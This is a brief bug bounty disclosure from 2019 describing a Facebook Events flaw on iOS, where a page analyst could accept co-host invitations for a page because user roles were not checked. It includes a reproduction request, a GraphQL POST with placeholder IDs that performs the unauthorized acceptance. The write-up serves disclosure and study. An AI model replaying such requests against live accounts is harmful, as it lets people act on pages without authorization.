Published On: 17 May 2019
Accept the request to co-host a event as a page analyst
Privacy/Authentication
Facebook | IOS
---
LOW VALIDThank @Max(Max Pasqua) for making write-up for me.
Description
Within Facebook Events there's a feature to invite other pages or people to co-host an event. Normally the roles are restricted that could accept the invite but Facebook was not properly checking the roles of the user making the request allowing a page analyst to accept the request and co-host the event.
Impact
Page analyst can accept co-host requests for an event as the page.
Reproduction Steps
Step
1
HTTP POST
graph.facebook.com/graphql/
doc_id = DOCID
variables = {"0":{"page_id":"PAGEID","admin_status":"ACCEPTED","actor_id":"PAGEID","context":{"event_action_history":[{"mechanism":"unknown","surface":"notifications_view"},{"mechanism":"surface","surface":"events_permalink"}]},"client_mutation_id":"","event_id":"EVENTID"}}
Videos